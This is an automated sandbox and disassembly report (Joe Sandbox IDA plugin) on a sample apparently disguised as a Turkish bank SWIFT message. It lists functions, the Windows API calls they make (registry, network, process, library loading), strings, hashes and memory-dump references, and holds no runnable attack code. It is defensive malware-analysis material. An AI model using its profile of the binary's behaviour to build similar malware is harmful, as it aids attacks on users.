Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 64de6228737f4319b5ef7f0520030c8c4367ed86bd23c4646b570bba90fd70a9
Instruction ID: dc080d3373ccdc32be1f4587d78f473a768c29dec776213146da86258c83fa0f
Opcode Fuzzy Hash: 64de6228737f4319b5ef7f0520030c8c4367ed86bd23c4646b570bba90fd70a9
Instruction Fuzzy Hash: 41418CB1600204EFDB55CF65D885B9ABBB9EF44314B1480A9ED09EF246D7F1DA84CBA0

Function 000E5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000E5075
GetMenuItemInfoW.USER32 ref: 000E5091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 000E50D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00161708,00000000), ref: 000E5120

Strings

0, xrefs: 000E506D

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 3af7eda6b42121d8af8e9bf5de11251e6111ad9f1c0c3ebf38eea604c1e415fe
Instruction ID: a5a971c2c439abaa2e1a063edb9b98a61741c0a122f5c2c3145a4e7030e9e1c4
Opcode Fuzzy Hash: 3af7eda6b42121d8af8e9bf5de11251e6111ad9f1c0c3ebf38eea604c1e415fe
Instruction Fuzzy Hash: 7F411530204781AFD720DF25DC80F6AB7E4AF85319F104A9EF966A72C2D730E840CB62

Function 0010B544 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0010B5D1

Strings

@U=u, xrefs: 0010B620

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InvalidateRect
String ID: @U=u
API String ID: 634782764-2594219639
Opcode ID: ba86147f7dcabde90013ab9b35a81a7d29fd9e86978fc0dde9bcc6cd897dd33c
Instruction ID: b5375ee4d642597950dc75462fa5fdce9c7e1ea00f7c57cae081df92c0918ac8
Opcode Fuzzy Hash: ba86147f7dcabde90013ab9b35a81a7d29fd9e86978fc0dde9bcc6cd897dd33c
Instruction Fuzzy Hash: 4731FC34608208BFEF349F18CCC8FE83765EB0A310F644551FA92D66E1D7B1A9909B51

Function 00100567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00100587

Strings

winapi, xrefs: 001005F8
cdecl, xrefs: 001005DE
stdcall, xrefs: 00100609
none, xrefs: 00100662

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 67b632778548ddc302afd41dc6fda15b47238a513fc6d18ac03c9b5763b539c8
Instruction ID: eb5646e2490c1a1973c1ba0417bbfbb6cf8a83082e626c0f5809ef3ee0c61db5
Opcode Fuzzy Hash: 67b632778548ddc302afd41dc6fda15b47238a513fc6d18ac03c9b5763b539c8
Instruction Fuzzy Hash: F731A370500656AFCF00DF94CD41AEEB3B5FF55314F008629E866AB6D2DB72A916CB50

Function 000A51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000A522F
_wcscpy.LIBCMT ref: 000A5283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 000A5293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00113CB0

Strings

Line: , xrefs: 00113CD9

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 4fa4af103bb88b389703af70e56f4c642959915737e7fec6f6b97c3d57e6a038
Instruction ID: 1c3e529c689f7958e3d7748ceaaaac5a0524a00df60bf8769abf2405a0967245
Opcode Fuzzy Hash: 4fa4af103bb88b389703af70e56f4c642959915737e7fec6f6b97c3d57e6a038
Instruction Fuzzy Hash: 0D31D171008340AFD730EBA0DC42FEE77E8AF46340F04491EF59592092EBB0A689CB92

Function 000F43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000F4401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000F4427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000F4457
InternetCloseHandle.WININET(00000000), ref: 000F449E

Part of subcall function 000F5052: GetLastError.KERNEL32(?,?,000F43CC,00000000,00000000,00000001), ref: 000F5067

Strings

, xrefs: 000F4450

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 28396f050f97fcf9455071933df3d3c67db7a85e849b42f41b7f71d180926446
Instruction ID: 814859482ba8db96050905e99d3eae96a21f4a1348f5cc448ca78925433751e0
Opcode Fuzzy Hash: 28396f050f97fcf9455071933df3d3c67db7a85e849b42f41b7f71d180926446
Instruction Fuzzy Hash: 42218EB250020CBEE7219F54DC85EBFB6ECEB48748F10801AFA09E2541EA689D45A770

Function 001090E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 000BD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000BD1BA
Part of subcall function 000BD17C: GetStockObject.GDI32(00000011), ref: 000BD1CE
Part of subcall function 000BD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 000BD1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0010915C
LoadLibraryW.KERNEL32(?), ref: 00109163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00109178
DestroyWindow.USER32(?), ref: 00109180

Strings

SysAnimate32, xrefs: 00109137

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: b86de36bb696790112f8e73c4144f7b8da2a7fae54a81a05e88e2715958fce7f
Instruction ID: f86d4f4a584dac6eff6adc385d5f3e525f81ffb766416f806b4c2e042b646cde
Opcode Fuzzy Hash: b86de36bb696790112f8e73c4144f7b8da2a7fae54a81a05e88e2715958fce7f
Instruction Fuzzy Hash: D4219D71300206BBEF204E64DCA8EBB37ADEF99374F100619F994961D2D7B1DC92A760

Function 000E9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 000E9588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000E95B9
GetStdHandle.KERNEL32(0000000C), ref: 000E95CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 000E9605

Strings

nul, xrefs: 000E9600

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 6388b92447c80d4c544a9ad4f24c4a3fdc4d5e1aeec4865d2e3f65f0d07977b6
Instruction ID: 033e9a347cee65336c93c3d3253b25ea110d9cc765ee62cb2422b89554aab64f
Opcode Fuzzy Hash: 6388b92447c80d4c544a9ad4f24c4a3fdc4d5e1aeec4865d2e3f65f0d07977b6
Instruction Fuzzy Hash: 4C217C71600645EFDB219F26EC05A9EBBF8AF85720F204A19F8A1E72E0D770D951CB10

Function 000E9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 000E9653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000E9683
GetStdHandle.KERNEL32(000000F6), ref: 000E9694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 000E96CE

Strings

nul, xrefs: 000E96C9

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 2bf156a6e424b614c813976f696e26077b625de007fd630ca59deef74940f03f
Instruction ID: 06e5589db7b768e60e73bd0decf529dc6748bdf8186f542246785a510f3303d0
Opcode Fuzzy Hash: 2bf156a6e424b614c813976f696e26077b625de007fd630ca59deef74940f03f
Instruction Fuzzy Hash: 29217171600245AFDB249F6ADC45E9E77E8AF45724F200A1AFCA1F72D1E7709851CB50

Function 000EDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000EDB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 000EDB5E
__swprintf.LIBCMT ref: 000EDB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,0013DC00), ref: 000EDBB5

Strings

%lu, xrefs: 000EDB71

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 2a4a6ec88690df0fce3a729e14465949727decf3f54951d54f1ca215c05f987d
Instruction ID: 5d2694e1804a346d92b7a57b8fe5d40b9ee3b0dc1ef751507f79c18054fd9c57
Opcode Fuzzy Hash: 2a4a6ec88690df0fce3a729e14465949727decf3f54951d54f1ca215c05f987d
Instruction Fuzzy Hash: 26218035A00148EFDB10EFA5D985EEEBBB8EF89704B014069F509E7252DB71EA41CB61

Function 000DC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000DC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000DC84A
Part of subcall function 000DC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000DC85D
Part of subcall function 000DC82D: GetCurrentThreadId.KERNEL32 ref: 000DC864
Part of subcall function 000DC82D: AttachThreadInput.USER32(00000000), ref: 000DC86B

GetFocus.USER32 ref: 000DCA05

Part of subcall function 000DC876: GetParent.USER32(?), ref: 000DC884

GetClassNameW.USER32(?,?,00000100), ref: 000DCA4E
EnumChildWindows.USER32(?,000DCAC4), ref: 000DCA76
__swprintf.LIBCMT ref: 000DCA90

Strings

%s%d, xrefs: 000DCA8A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: ba875fdd7da5e393f67ae02ac35946c612ef757bb88d536e86bcc0aaa76792ef
Instruction ID: 225838b2758dbfb9ca97b5ef0c64ece1169dea00c63b351452774be18a5d44c2
Opcode Fuzzy Hash: ba875fdd7da5e393f67ae02ac35946c612ef757bb88d536e86bcc0aaa76792ef
Instruction Fuzzy Hash: D011AF7560030ABBDB11BFA4DC85FE93779AB45704F048066FE08AA283CB709946DB71

Function 000BD17C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000BD1BA
GetStockObject.GDI32(00000011), ref: 000BD1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 000BD1D8

Strings

@U=u, xrefs: 000BD1D8

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID: @U=u
API String ID: 3970641297-2594219639
Opcode ID: 33c0b61fab57c013d8833d6606c5d9790bcd22c2bfc55aab8ea46bc005682c6f
Instruction ID: 121a4c6c449224f0159d68f3aab4dfa47f91abe1a328fbce49e03f788eb969d0
Opcode Fuzzy Hash: 33c0b61fab57c013d8833d6606c5d9790bcd22c2bfc55aab8ea46bc005682c6f
Instruction Fuzzy Hash: 7111C072101509BFEF224FA4DC50EEABBA9FF08364F040112FE0552050E731DCA1EBA0

Function 00101945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001019F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00101A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00101B49
CloseHandle.KERNEL32(?), ref: 00101BBF

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: d094731bd4d63a257da39429ef368ea3035f276f1eb025af3abc5b7e10d9f2da
Instruction ID: 12c1b3f59001cb4911f5af87f45d05fb1e190bffc87bb1eb6e62d072ccc2c698
Opcode Fuzzy Hash: d094731bd4d63a257da39429ef368ea3035f276f1eb025af3abc5b7e10d9f2da
Instruction Fuzzy Hash: 68815071600214ABDF24AF64C896BEDBBF5BF08720F148459F905AF3C2D7B9A9418B90

Function 000E1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000E1CB4
VariantClear.OLEAUT32(00000013), ref: 000E1D26
VariantClear.OLEAUT32(00000000), ref: 000E1D81
VariantClear.OLEAUT32(?), ref: 000E1DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 000E1E26

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 4044e4e50747752d0e285a6125070c352d1d803f76ad91b378193c4665932bc7
Instruction ID: 2326519fe8743f15852ccb6dd0ae1a5d8f6a25f2dbfb20c15066cf777cd70753
Opcode Fuzzy Hash: 4044e4e50747752d0e285a6125070c352d1d803f76ad91b378193c4665932bc7
Instruction Fuzzy Hash: D25139B5A00249EFDB24CF58D884AEAB7F8FF4C314B158559E959EB301D730EA51CBA0

Function 00100688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000A936C: __swprintf.LIBCMT ref: 000A93AB
Part of subcall function 000A936C: __itow.LIBCMT ref: 000A93DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 001006EE
GetProcAddress.KERNEL32(00000000,?), ref: 0010077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 0010079B
GetProcAddress.KERNEL32(00000000,?), ref: 001007E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 001007FB

Part of subcall function 000BE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000EA574,?,?,00000000,00000008), ref: 000BE675
Part of subcall function 000BE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,000EA574,?,?,00000000,00000008), ref: 000BE699

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 778b9671b8db6990ff0b0dc479a0bd1ee61529861d334180952460efae4882b8
Instruction ID: 3d83b5ecbadd4789e070a838d8187ac07dc298fd6a38d7317a7d7d14b685593a
Opcode Fuzzy Hash: 778b9671b8db6990ff0b0dc479a0bd1ee61529861d334180952460efae4882b8
Instruction Fuzzy Hash: AC515A75A00205EFCB01EFA8C481EEDB7B5BF59310F158056EA56AB392DB70ED42CB50

Function 00102E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00103C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00102BB5,?,?), ref: 00103C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00102EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00102F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00102F75
RegCloseKey.ADVAPI32(?,?), ref: 00102FA1
RegCloseKey.ADVAPI32(00000000), ref: 00102FAE

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 36262d96c7081c38b35ca23da94f79dfeceb81f84f359de366d385c9b6b00fe9
Instruction ID: 082d14eb11420e3e315c67f0a7928f3e359f3998bfbd657a87883fbd7da69863
Opcode Fuzzy Hash: 36262d96c7081c38b35ca23da94f79dfeceb81f84f359de366d385c9b6b00fe9
Instruction Fuzzy Hash: A6516A71208245AFD704EFA4C885EABB7F8FF89304F00482DF595972A2DB71E905CB52

Function 000F1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000F12B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 000F12DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000F131C

Part of subcall function 000A936C: __swprintf.LIBCMT ref: 000A93AB
Part of subcall function 000A936C: __itow.LIBCMT ref: 000A93DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000F1341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000F1349

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

